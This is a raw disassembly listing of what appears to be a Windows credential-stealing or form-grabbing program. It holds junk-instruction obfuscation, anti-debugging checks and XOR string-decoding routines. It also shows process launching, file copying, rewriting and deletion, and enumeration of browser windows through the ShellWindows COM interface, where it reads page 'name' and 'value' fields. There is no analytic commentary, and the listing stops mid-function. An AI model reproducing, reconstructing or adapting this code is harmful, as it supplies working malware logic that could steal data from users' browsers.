loc_406201: ; CODE XREF: sub_405F5E+20F�j
push 3Bh
push offset byte_447043
call sub_40525E
mov [ebp+var_11C], eax
push 11h
push offset byte_447031
call sub_40525E
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
mov edi, [ebp+var_11C]
push edi
push 80000001h
call sub_4015B0
push 33h
push offset byte_446FFD
call sub_40525E
push 1
push 0
push offset byte_4474F5
push offset byte_4474F5
push eax
push 80000001h
call sub_4015B0
mov [ebp+var_10A], 46A3h
inc [ebp+var_10A]
push 3Bh
push offset byte_446FC1
call sub_40525E
push 1
push 0
push offset byte_4474F5
push offset byte_4474F5
push eax
push 80000001h
call sub_4015B0
add esp, 68h
mov ebx, 0B22h
sub ebx, 2C16h
pop edi
pop esi
pop ebx
leave
retn
sub_405F5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4062A9 proc near ; CODE XREF: sub_409883+236�p
; sub_409883+570�p ...
var_3C2 = word ptr -3C2h
var_3C0 = dword ptr -3C0h
var_3BC = dword ptr -3BCh
var_3B8 = dword ptr -3B8h
var_3B2 = byte ptr -3B2h
var_2AE = byte ptr -2AEh
var_2A9 = byte ptr -2A9h
var_2A8 = byte ptr -2A8h
var_2A6 = byte ptr -2A6h
var_2A2 = word ptr -2A2h
var_2A0 = dword ptr -2A0h
var_29B = byte ptr -29Bh
var_293 = word ptr -293h
var_291 = dword ptr -291h
var_28D = byte ptr -28Dh
var_28C = byte ptr -28Ch
var_288 = word ptr -288h
var_286 = byte ptr -286h
var_27F = byte ptr -27Fh
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_267 = byte ptr -267h
var_266 = word ptr -266h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_250 = byte ptr -250h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_11C = dword ptr -11Ch
var_118 = word ptr -118h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 3C4h
push ebx
push esi
push edi
lea edi, [ebp+var_27F]
lea esi, aLO5 ; "L-o-5 "
mov ecx, 7
rep movsb
and [ebp+var_14C], 0
call sub_40C4E8 ; RtlGetLastWin32Error
xor ebx, ebx
lea edi, [ebp+var_286]
lea esi, aYvlszz ; "yvlSzz"
mov ecx, 7
rep movsb
push offset dword_4422D4
call sub_40C5B4 ; InterlockedIncrement
mov [ebp+var_26C], eax
mov ax, word_44233B
mov [ebp+var_288], ax
push 10h
push 0
lea eax, [ebp+var_260]
push eax
call sub_40C9A4
mov [ebp+var_264], 6A70h
sub [ebp+var_264], 206Eh
mov [ebp+var_270], 104h
call sub_40C5D8 ; IsDebuggerPresent
push 21h
push offset byte_446F9F
call sub_40525E
mov [ebp+var_2A0], eax
push 4
push offset word_446F9A
call sub_40525E
lea edi, [ebp+var_28C]
push edi
lea edi, [ebp+var_270]
push edi
lea edi, [ebp+var_250]
push edi
push eax
mov edi, [ebp+var_2A0]
push edi
push 80000002h
call sub_401490
add esp, 34h
mov [ebp+var_274], eax
lea edi, [ebp+var_28D]
lea esi, byte_44233D
xor ecx, ecx
inc ecx
rep movsb
cmp [ebp+var_274], 0
jnz short loc_4063C7
mov [ebp+var_2A2], 3E4Eh
add [ebp+var_2A2], 2666h
push [ebp+arg_0]
call sub_40C608 ; LocalFree
call sub_40C548 ; GetTickCount
xor eax, eax
jmp loc_406849
; ---------------------------------------------------------------------------
loc_4063C7: ; CODE XREF: sub_4062A9+F6�j
call sub_405F5E
call sub_40C518 ; GetProcessHeap
push 104h
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_250]
push eax
call sub_40C4A0 ; ExpandEnvironmentStringsA
mov eax, dword_44233E
mov [ebp+var_291], eax
push [ebp+var_26C]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_250]
push eax
call sub_405636
add esp, 20h
mov [ebp+var_14C], eax
cmp [ebp+arg_1C], 0
jz short loc_40643F
cmp eax, 0FFFFFFFFh
jz short loc_406439
mov eax, [ebp+arg_1C]
mov edx, [ebp+var_14C]
mov [eax], edx
jmp short loc_40643F
; ---------------------------------------------------------------------------
loc_406439: ; CODE XREF: sub_4062A9+181�j
mov eax, [ebp+arg_1C]
and dword ptr [eax], 0
loc_40643F: ; CODE XREF: sub_4062A9+17C�j
; sub_4062A9+18E�j
cmp [ebp+var_14C], 0
jnz short loc_406474
mov [ebp+var_2A2], 4C24h
movzx eax, [ebp+var_2A2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2A2], ax
push [ebp+arg_0]
call sub_40C608 ; LocalFree
xor eax, eax
jmp loc_406849
; ---------------------------------------------------------------------------
loc_406474: ; CODE XREF: sub_4062A9+19D�j
push 0Eh
push offset byte_446F8B
call sub_40525E
push eax
lea edi, [ebp+var_104]
push edi
call sub_40C9F8
call sub_40C5D8 ; IsDebuggerPresent
lea eax, [ebp+var_250]
push eax
lea eax, [ebp+var_104]
push eax
call sub_40C9F8
mov ax, word_442342
mov [ebp+var_293], ax
call sub_404502
mov [ebp+var_278], eax
call sub_40C4B8 ; GetCurrentProcessId
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40C9A4
call sub_40C4E8 ; RtlGetLastWin32Error
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40C9A4
add esp, 30h
call sub_40C518 ; GetProcessHeap
mov [ebp+var_148], 44h
mov [ebp+var_266], 1B87h
movzx eax, [ebp+var_266]
imul eax, 4752h
mov [ebp+var_266], ax
mov [ebp+var_11C], 1
mov [ebp+var_118], 1
cmp [ebp+var_278], 0
jz short loc_406541
lea eax, [ebp+var_148]
push eax
call sub_404590
pop ecx
jmp short loc_40654A
; ---------------------------------------------------------------------------
loc_406541: ; CODE XREF: sub_4062A9+287�j
mov [ebp+var_118], 0
loc_40654A: ; CODE XREF: sub_4062A9+296�j
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_148]
push eax
push 0
push 0
push 20h
push 0
push 0
push 0
lea eax, [ebp+var_104]
push eax
push 0
call sub_40C6F8 ; CreateProcessA
or eax, eax
jz loc_4067D5
call sub_40C4B8 ; GetCurrentProcessId
push [ebp+var_25C]
call sub_40C530 ; CloseHandle
call sub_40C4C4 ; GetCurrentThreadId
push 22h
push offset dword_446F68
call sub_40525E
push [ebp+var_26C]
push offset aMicrosoftCorp ; "MicroSoft-Corp"
push eax
lea edi, [ebp+var_104]
push edi
call sub_40C9D4
add esp, 18h
mov byte ptr [ebp+var_2A2+1], 0
jmp short loc_406623
; ---------------------------------------------------------------------------
loc_4065BF: ; CODE XREF: sub_4062A9+382�j
lea edi, [ebp+var_2A9]
lea esi, aXsc ; "-<xSc "
mov ecx, 7
rep movsb
push 7
push offset dword_446F60
call sub_40525E
add esp, 8
lea edi, [ebp+var_104]
push edi
push eax
call sub_40C734 ; FindWindowA
mov ebx, eax
call sub_40C548 ; GetTickCount
or ebx, ebx
jnz short loc_40662D
mov byte ptr [ebp+var_2A2], 93h
add byte ptr [ebp+var_2A2], 9Fh
mov eax, dword_4422CC
add eax, 3DAh
push eax
call sub_40C674 ; Sleep
call sub_40C5D8 ; IsDebuggerPresent
add byte ptr [ebp+var_2A2+1], 1
loc_406623: ; CODE XREF: sub_4062A9+314�j
mov al, byte ptr [ebp+var_2A2+1]
cmp al, 0Ah
jb short loc_4065BF
loc_40662D: ; CODE XREF: sub_4062A9+34E�j
or ebx, ebx
jz loc_4067BE
call sub_40C4C4 ; GetCurrentThreadId
push 0EA60h
call sub_40C674 ; Sleep
lea edi, [ebp+var_2A6]
lea esi, aAD ; "A&$D"
mov ecx, 5
rep movsb
push 104h
lea eax, [ebp+var_104]
push eax
push ebx
call sub_40C71C ; GetWindowTextA
call sub_40C4E8 ; RtlGetLastWin32Error
mov eax, 3
sub eax, dword_4422C8
push eax
push offset aXOkrecv11 ; "X-okRecv11"
lea eax, [ebp+var_104]
push eax
call sub_4017D2
add esp, 0Ch
cmp eax, 0FFFFh
jz loc_4067B0
call sub_40C4B8 ; GetCurrentProcessId
lea edi, [ebp+var_2AE]
lea esi, a24f ; "% 24f^$"
movsd
movsd
lea eax, [ebp+var_3B2]
push eax
push [ebp+arg_4]
call sub_40538B
add esp, 8
or eax, eax
jz loc_40679F
mov [ebp+var_3B8], 42F8h
inc [ebp+var_3B8]
push 0
push [ebp+arg_8]
lea eax, [ebp+var_3B2]
push eax
call sub_40C5F0 ; CopyFileA
mov [ebp+var_3BC], 6540h
inc [ebp+var_3BC]
lea eax, [ebp+var_14C]
push eax
push [ebp+arg_8]
call sub_401A43
mov [ebp+var_3C0], eax
mov ax, word_442358
mov [ebp+var_3C2], ax
push [ebp+arg_8]
call sub_40C488 ; DeleteFileA
push offset aHtml ; "<HTML><!--"
call sub_40C6E0 ; lstrlenA
push eax
push offset aHtml ; "<HTML><!--"
push [ebp+var_3C0]
call sub_40CA10
add esp, 14h
or eax, eax
jnz short loc_40676D
push offset aHtml ; "<HTML><!--"
call sub_40C6E0 ; lstrlenA
mov edi, [ebp+var_14C]
sub edi, 3Ah
push edi
mov edi, eax
add edi, [ebp+var_3C0]
push edi
push [ebp+arg_8]
call sub_4052F4
add esp, 0Ch
jmp short loc_406788
; ---------------------------------------------------------------------------
loc_40676D: ; CODE XREF: sub_4062A9+498�j
mov eax, [ebp+var_14C]
sub eax, 40h
push eax
push [ebp+var_3C0]
push [ebp+arg_8]
call sub_4052F4
add esp, 0Ch
loc_406788: ; CODE XREF: sub_4062A9+4C2�j
push [ebp+var_3C0]
call sub_40C608 ; LocalFree
mov [ebp+var_14C], 2
jmp short loc_4067EA
; ---------------------------------------------------------------------------
loc_40679F: ; CODE XREF: sub_4062A9+417�j
call sub_40C5D8 ; IsDebuggerPresent
mov [ebp+var_14C], 1
jmp short loc_4067EA
; ---------------------------------------------------------------------------
loc_4067B0: ; CODE XREF: sub_4062A9+3EA�j
call sub_40C4B8 ; GetCurrentProcessId
and [ebp+var_14C], 0
jmp short loc_4067EA
; ---------------------------------------------------------------------------
loc_4067BE: ; CODE XREF: sub_4062A9+386�j
mov byte ptr [ebp+var_2A2], 7Bh
add byte ptr [ebp+var_2A2], 1
and [ebp+var_14C], 0
jmp short loc_4067EA
; ---------------------------------------------------------------------------
loc_4067D5: ; CODE XREF: sub_4062A9+2CB�j
lea edi, [ebp+var_2A8]
lea esi, aXvsRw ; "|xs&RW"
movsd
movsd
and [ebp+var_14C], 0
loc_4067EA: ; CODE XREF: sub_4062A9+4F4�j
; sub_4062A9+505�j ...
lea eax, [ebp+var_250]
push eax
call sub_40C488 ; DeleteFileA
push [ebp+arg_0]
call sub_40C608 ; LocalFree
lea edi, [ebp+var_29B]
lea esi, word_442362
movsd
movsd
push 0
push [ebp+var_260]
call sub_40C680 ; TerminateProcess
mov [ebp+var_267], 0CBh
movzx eax, [ebp+var_267]
imul eax, 5F1h
mov [ebp+var_267], al
push [ebp+var_260]
call sub_40C530 ; CloseHandle
call sub_40C5D8 ; IsDebuggerPresent
mov eax, [ebp+var_14C]
loc_406849: ; CODE XREF: sub_4062A9+119�j
; sub_4062A9+1C6�j
pop edi
pop esi
pop ebx
leave
retn
sub_4062A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40684E proc near ; CODE XREF: sub_406A35+B0�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 36Eh
push esi
push [ebp+arg_0]
mov eax, dword_442374
lea eax, ds:41C910h[eax]
push eax
call sub_40C998
add esp, 0Ch
xor edi, edi
jmp short loc_406894
; ---------------------------------------------------------------------------
loc_40687D: ; CODE XREF: sub_40684E+48�j
mov eax, dword_442374
add eax, edi
lea eax, ds:41C910h[eax]
movsx edx, byte ptr [eax]
xor edx, 45h
mov [eax], dl
inc edi
loc_406894: ; CODE XREF: sub_40684E+2D�j
cmp edi, esi
jl short loc_40687D
mov [ebp+var_8], 3DAh
mov eax, dword_442374
add eax, esi
mov byte ptr ds:dword_41C910[eax], 0
mov edi, dword_442374
inc dword_442374
mov eax, dword_442374
add eax, 3
add eax, esi
mov dword_442374, eax
cmp eax, 0DE6h
jle short loc_4068D7
and dword_442374, 0
loc_4068D7: ; CODE XREF: sub_40684E+80�j
mov [ebp+var_C], 0C6h
lea eax, dword_41C910[edi]
pop edi
pop esi
leave
retn
sub_40684E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4068E8 proc near ; CODE XREF: sub_406D91+1BF�p
; sub_406D91+5BE�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, [ebp+arg_4]
call sub_40C5D8 ; IsDebuggerPresent
push ebx
call sub_40C6EC ; lstrlenW
mov edi, eax
mov [ebp+var_1], 9Eh
add [ebp+var_1], 1
push 0
push 0
push 1FFFh
push esi
push edi
push ebx
push 0
push 0
call sub_40C6B0 ; WideCharToMultiByte
call sub_40C4E8 ; RtlGetLastWin32Error
mov byte ptr [esi+edi], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_4068E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40692F proc near ; CODE XREF: sub_406980+A3�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
mov edi, [ebp+arg_0]
call sub_40C4E8 ; RtlGetLastWin32Error
cmp dword_44237C, 0
jz short loc_406951
mov eax, dword_44237C
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_406951: ; CODE XREF: sub_40692F+15�j
call sub_40C4E8 ; RtlGetLastWin32Error
mov eax, [edi+4]
push dword ptr [edi+4]
mov ebx, [eax]
call dword ptr [ebx+8]
call sub_40C518 ; GetProcessHeap
mov eax, [edi]
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+8]
mov [ebp+var_1], 99h
sub [ebp+var_1], 61h
call sub_40B9F8
pop edi
pop ebx
leave
retn
sub_40692F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406980 proc near ; CODE XREF: sub_406D91+4D�p
var_14 = byte ptr -14h
var_4 = word ptr -4
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
call sub_40C5D8 ; IsDebuggerPresent
and dword ptr [edi], 0
and dword ptr [edi+4], 0
push 0
call sub_40B9EC
lea eax, [ebp+var_14]
push eax
push offset a9ba05972F6a811 ; "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
call sub_40B9E0
mov esi, eax
call sub_40C4E8 ; RtlGetLastWin32Error
xor ebx, ebx
cmp esi, ebx
setl bl
or ebx, ebx
jnz short loc_406A22
mov [ebp+var_1], 2Bh
add [ebp+var_1], 6
push edi
push offset dword_447AE8
push 4
push 0
lea eax, [ebp+var_14]
push eax
call sub_40B9D4
mov esi, eax
xor ebx, ebx
cmp esi, ebx
setl bl
or ebx, ebx
jnz short loc_406A22
mov eax, edi
add eax, 4
push eax
push offset dword_447AD8
mov eax, [edi]
push dword ptr [edi]
mov ebx, [eax]
call dword ptr ds:0[ebx]
mov esi, eax
mov [ebp+var_4], 7D3Eh
add [ebp+var_4], 5DA6h
xor ebx, ebx
cmp esi, ebx
setl bl
or ebx, ebx
jnz short loc_406A22
call sub_40C554 ; GetVersion
xor eax, eax
inc eax
jmp short loc_406A30
; ---------------------------------------------------------------------------
loc_406A22: ; CODE XREF: sub_406980+3D�j
; sub_406980+65�j ...
push edi
call sub_40692F
pop ecx
call sub_40C4B8 ; GetCurrentProcessId
xor eax, eax
loc_406A30: ; CODE XREF: sub_406980+A0�j
pop edi
pop esi
pop ebx
leave
retn
sub_406980 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A35 proc near ; CODE XREF: sub_406D91+CE�p
var_10059 = byte ptr -10059h
var_10058 = word ptr -10058h
var_10055 = byte ptr -10055h
var_1004E = dword ptr -1004Eh
var_1004A = byte ptr -1004Ah
var_10044 = byte ptr -10044h
var_1003C = byte ptr -1003Ch
var_10039 = byte ptr -10039h
var_10032 = byte ptr -10032h
var_1002C = dword ptr -1002Ch
var_10028 = dword ptr -10028h
var_10024 = byte ptr -10024h
var_25 = byte ptr -25h
var_24 = word ptr -24h
var_21 = byte ptr -21h
var_20 = word ptr -20h
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1005Ch
call sub_40C43C
push ebx
push esi
push edi
call sub_40C4B8 ; GetCurrentProcessId
cmp dword_442380, 0FFFFh
jz short loc_406A5D
and dword_442378, 0
loc_406A5D: ; CODE XREF: sub_406A35+1F�j
mov eax, dword_442384
mov [ebp+var_1002C], eax
mov eax, dword_442378
cmp [ebp+arg_4], eax
jz loc_406CF4
lea edi, [ebp+var_10032]
lea esi, aVb_ ; "$VB ."
mov ecx, 3
rep movsw
mov eax, [ebp+arg_4]
mov dword_442378, eax
cmp dword_44237C, 0
jz short loc_406AB2
call sub_40C554 ; GetVersion
mov eax, dword_44237C
push eax
mov esi, [eax]
call dword ptr [esi+8]
and dword_44237C, 0
loc_406AB2: ; CODE XREF: sub_406A35+64�j
lea edi, [ebp+var_10039]
lea esi, aMSD ; "M S^d/"
mov ecx, 7
rep movsb
push 0FFFFh
lea eax, [ebp+var_10024]
push eax
push [ebp+arg_4]
call sub_40C71C ; GetWindowTextA
call sub_40C4C4 ; GetCurrentThreadId
push 1Bh
push offset dword_446EE0
call sub_40684E
mov edi, 0Bh
sub edi, dword_442370
push edi
push eax
lea edi, [ebp+var_10024]
push edi
call sub_4017D2
add esp, 14h
cmp eax, 0FFFFh
jnz short loc_406B2B
mov [ebp+var_10058], 7B1Ah
sub [ebp+var_10058], 49F7h
and dword_44237C, 0
jmp loc_406CF4
; ---------------------------------------------------------------------------
loc_406B2B: ; CODE XREF: sub_406A35+D6�j
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov ebx, eax
lea edi, [ebp+var_1003C]
lea esi, aJz ; "JZ"
mov ecx, 3
rep movsb
cmp [ebp+var_8], 0
jz loc_406CF4
lea edi, [ebp+var_10044]
lea esi, a?alV ; "?l / "
movsd
movsd
or ebx, ebx
jnz loc_406CF4
call sub_40C518 ; GetProcessHeap
and [ebp+var_4], 0
cmp dword_442380, 0FFFFh
jz short loc_406BD3
lea edi, [ebp+var_10059]
lea esi, byte_4423A0
xor ecx, ecx
inc ecx
rep movsb
inc dword_442380
mov eax, [ebp+var_8]
cmp dword_442380, eax
jbe short loc_406BAE
and dword_442380, 0
loc_406BAE: ; CODE XREF: sub_406A35+170�j
mov [ebp+var_10058], 2422h
movzx eax, [ebp+var_10058]
imul eax, 1389h
mov [ebp+var_10058], ax
mov eax, dword_442380
mov [ebp+var_4], eax
loc_406BD3: ; CODE XREF: sub_406A35+14E�j
; sub_406A35+29F�j
push 0
call sub_40C95C
pop ecx
mov [ebp+var_20], 2
mov eax, [ebp+var_4]
mov [ebp+var_18], eax
mov dword_442380, eax
lea eax, [ebp+var_C]
push eax
lea esi, [ebp+var_20]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_0]
mov edi, [edi+4]
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
mov [ebp+var_21], 46h
movzx eax, [ebp+var_21]
imul eax, 7D15h
mov [ebp+var_21], al
or ebx, ebx
jnz loc_406CA6
push offset dword_44237C
push offset dword_447AF8
mov eax, [ebp+var_C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov [ebp+var_24], 52B6h
inc [ebp+var_24]
or ebx, ebx
jnz short loc_406CA6
call sub_40C4B8 ; GetCurrentProcessId
lea eax, [ebp+var_10028]
push eax
mov eax, dword_44237C
push eax
mov edi, [eax]
call dword ptr [edi+94h]
mov ebx, eax
lea edi, [ebp+var_1004A]
lea esi, a_vY ; ".=#y"
mov ecx, 3
rep movsw
or ebx, ebx
jnz short loc_406CA6
mov eax, dword_4423A7
mov [ebp+var_1004E], eax
mov dword_442380, 0FFFFh
mov eax, [ebp+arg_4]
cmp [ebp+var_10028], eax
jz short loc_406CF4
call sub_40C4B8 ; GetCurrentProcessId
loc_406CA6: ; CODE XREF: sub_406A35+1EB�j
; sub_406A35+216�j ...
cmp dword_44237C, 0
jz short loc_406CBA
mov eax, dword_44237C
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_406CBA: ; CODE XREF: sub_406A35+278�j
mov [ebp+var_25], 9Fh
movzx eax, [ebp+var_25]
imul eax, 38A5h
mov [ebp+var_25], al
inc [ebp+var_4]
mov eax, [ebp+var_8]
cmp [ebp+var_4], eax
jb loc_406BD3
lea edi, [ebp+var_10055]
lea esi, aNhRq ; " nH rQ"
mov ecx, 7
rep movsb
and dword_44237C, 0
loc_406CF4: ; CODE XREF: sub_406A35+3B�j
; sub_406A35+F1�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_406A35 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406CF9 proc near ; CODE XREF: sub_406D91+62F�p
; sub_406D91+679�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 38Dh
push esi
push [ebp+arg_0]
mov eax, dword_4423BC
lea eax, ds:431D90h[eax]
push eax
call sub_40C998
add esp, 0Ch
xor edi, edi
jmp short loc_406D41
; ---------------------------------------------------------------------------
loc_406D27: ; CODE XREF: sub_406CF9+4A�j
mov eax, dword_4423BC
add eax, edi
lea eax, ds:431D90h[eax]
movsx edx, byte ptr [eax]
xor edx, 80h
mov [eax], dl
inc edi
loc_406D41: ; CODE XREF: sub_406CF9+2C�j
cmp edi, esi
jl short loc_406D27
mov eax, dword_4423BC
add eax, esi
mov byte ptr ds:dword_431D90[eax], 0
mov edi, dword_4423BC
mov eax, edi
add eax, 6
add eax, esi
mov dword_4423BC, eax
add dword_4423BC, 2
cmp dword_4423BC, 0E01h
jle short loc_406D80
and dword_4423BC, 0
loc_406D80: ; CODE XREF: sub_406CF9+7E�j
mov [ebp+var_8], 0A5h
lea eax, dword_431D90[edi]
pop edi
pop esi
leave
retn
sub_406CF9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D91 proc near ; CODE XREF: sub_407F34+51�p
var_6383E = dword ptr -6383Eh
var_63839 = byte ptr -63839h
var_63838 = byte ptr -63838h
var_63830 = dword ptr -63830h
var_6382C = word ptr -6382Ch
var_6382A = byte ptr -6382Ah
var_6282B = byte ptr -6282Bh
var_62826 = word ptr -62826h
var_62824 = dword ptr -62824h
var_62820 = dword ptr -62820h
var_6281C = dword ptr -6281Ch
var_62818 = word ptr -62818h
var_62810 = dword ptr -62810h
var_62808 = word ptr -62808h
var_62800 = dword ptr -62800h
var_627FA = dword ptr -627FAh
var_627F5 = byte ptr -627F5h
var_627F4 = dword ptr -627F4h
var_627F0 = dword ptr -627F0h
var_627E9 = byte ptr -627E9h
var_627E4 = byte ptr -627E4h
var_627E1 = byte ptr -627E1h
var_627DB = dword ptr -627DBh
var_627D7 = byte ptr -627D7h
var_627D1 = byte ptr -627D1h
var_627CA = byte ptr -627CAh
var_627C9 = byte ptr -627C9h
var_627C8 = dword ptr -627C8h
var_627C4 = word ptr -627C4h
var_627C2 = byte ptr -627C2h
var_627C1 = byte ptr -627C1h
var_627C0 = dword ptr -627C0h
var_627BC = byte ptr -627BCh
var_627BB = byte ptr -627BBh
var_626BC = dword ptr -626BCh
var_626B5 = byte ptr -626B5h
var_626B4 = dword ptr -626B4h
var_626B0 = word ptr -626B0h
var_626A8 = dword ptr -626A8h
var_6269C = dword ptr -6269Ch
var_62698 = dword ptr -62698h
var_62694 = dword ptr -62694h
var_62690 = dword ptr -62690h
var_6268C = dword ptr -6268Ch
var_62688 = dword ptr -62688h
var_62684 = dword ptr -62684h
var_6267F = byte ptr -6267Fh
var_6267D = byte ptr -6267Dh
var_6267C = dword ptr -6267Ch
var_62676 = byte ptr -62676h
var_5269A = word ptr -5269Ah
var_52698 = byte ptr -52698h
var_52690 = dword ptr -52690h
var_52688 = word ptr -52688h
var_52686 = byte ptr -52686h
var_52681 = byte ptr -52681h
var_52680 = dword ptr -52680h
var_5267C = dword ptr -5267Ch
var_52677 = byte ptr -52677h
var_52674 = byte ptr -52674h
var_5266D = byte ptr -5266Dh
var_5266C = byte ptr -5266Ch
var_5266A = word ptr -5266Ah
var_52667 = byte ptr -52667h
var_52666 = byte ptr -52666h
var_52660 = dword ptr -52660h
var_52659 = byte ptr -52659h
var_52653 = byte ptr -52653h
var_5264D = byte ptr -5264Dh
var_5264C = dword ptr -5264Ch
var_52648 = dword ptr -52648h
var_52644 = byte ptr -52644h
var_5263C = dword ptr -5263Ch
var_52638 = word ptr -52638h
var_52636 = word ptr -52636h
var_52634 = dword ptr -52634h
var_5262F = byte ptr -5262Fh
var_5262E = word ptr -5262Eh
var_5262C = dword ptr -5262Ch
var_52628 = dword ptr -52628h
var_52622 = word ptr -52622h
var_5261F = byte ptr -5261Fh
var_5261E = word ptr -5261Eh
var_5261C = byte ptr -5261Ch
var_5261B = byte ptr -5261Bh
var_5261A = word ptr -5261Ah
var_52618 = dword ptr -52618h
var_52614 = word ptr -52614h
var_52612 = word ptr -52612h
var_52610 = dword ptr -52610h
var_5260A = word ptr -5260Ah
var_52608 = dword ptr -52608h
var_52604 = dword ptr -52604h
var_525FE = word ptr -525FEh
var_525FC = dword ptr -525FCh
var_525F8 = dword ptr -525F8h
var_525F4 = dword ptr -525F4h
var_525EE = word ptr -525EEh
var_525EC = dword ptr -525ECh
var_525E8 = dword ptr -525E8h
var_525E4 = dword ptr -525E4h
var_525DF = byte ptr -525DFh
var_524E0 = byte ptr -524E0h
var_524D8 = dword ptr -524D8h
var_524CC = dword ptr -524CCh
var_524C8 = byte ptr -524C8h
var_39E28 = byte ptr -39E28h
var_21788 = word ptr -21788h
var_21786 = word ptr -21786h
var_21784 = dword ptr -21784h
var_2177D = byte ptr -2177Dh
var_1177E = word ptr -1177Eh
var_1177C = word ptr -1177Ch
var_10FAC = dword ptr -10FACh
var_10FA8 = dword ptr -10FA8h
var_10FA4 = dword ptr -10FA4h
var_10001 = byte ptr -10001h
var_2 = word ptr -2
push ebp
mov ebp, esp
mov eax, 63840h
call sub_40C43C
push ebx
push esi
push edi
call sub_40C554 ; GetVersion
push offset aValue ; "value"
call sub_40B9B0
mov [ebp+var_10FA8], eax
lea edi, [ebp+var_5264D]
lea esi, byte_4423C6
xor ecx, ecx
inc ecx
rep movsb
push offset aName ; "name"
call sub_40B9B0
mov [ebp+var_10FAC], eax
lea eax, [ebp+var_52644]
push eax
call sub_406980
pop ecx
or eax, eax
jz loc_407F2F
mov [ebp+var_52612], 0C95h
movzx eax, [ebp+var_52612]
imul eax, 782Ah
mov [ebp+var_52612], ax
loc_406E09: ; CODE XREF: sub_406D91+EF�j
; sub_406D91+12F�j ...
push 0
call sub_40C95C
mov [ebp+var_52614], 6C6Bh
movzx eax, [ebp+var_52614]
imul eax, 6529h
mov [ebp+var_52614], ax
call sub_40C764 ; GetForegroundWindow
mov [ebp+var_52618], eax
mov [ebp+var_525F8], 691Eh
mov eax, [ebp+var_525F8]
mov edx, eax
add edx, eax
mov [ebp+var_525F8], edx
push [ebp+var_52618]
lea eax, [ebp+var_52644]
push eax
call sub_406A35
add esp, 0Ch
mov [ebp+var_5261A], 2103h
add [ebp+var_5261A], 67C5h
cmp dword_44237C, 0
jz short loc_406E09
mov [ebp+var_5261B], 1Fh
movzx eax, [ebp+var_5261B]
imul eax, 4275h
mov [ebp+var_5261B], al
lea eax, [ebp+var_525F4]
push eax
mov eax, dword_44237C
push eax
mov edi, [eax]
call dword ptr [edi+48h]
mov ebx, eax
mov [ebp+var_5261C], 0CAh
add [ebp+var_5261C], 1
or ebx, ebx
jnz loc_406E09
call sub_40C518 ; GetProcessHeap
lea eax, [ebp+var_525FC]
push eax
push offset dword_447A98
mov eax, [ebp+var_525F4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
or ebx, ebx
jnz loc_407F10
mov [ebp+var_5261E], 55E0h
inc [ebp+var_5261E]
lea eax, [ebp+var_52648]
push eax
mov eax, dword_44237C
push eax
mov edi, [eax]
call dword ptr [edi+78h]
mov ebx, eax
lea edi, [ebp+var_52653]
lea esi, a6uxb6 ; "6Ux6"
mov ecx, 3
rep movsw
or ebx, ebx
jnz loc_407EF6
lea edi, [ebp+var_52659]
lea esi, aTro_ ; "tRO,_"
mov ecx, 3
rep movsw
push offset byte_41FC80
push [ebp+var_52648]
call sub_4068E8
add esp, 8
mov edi, eax
inc edi
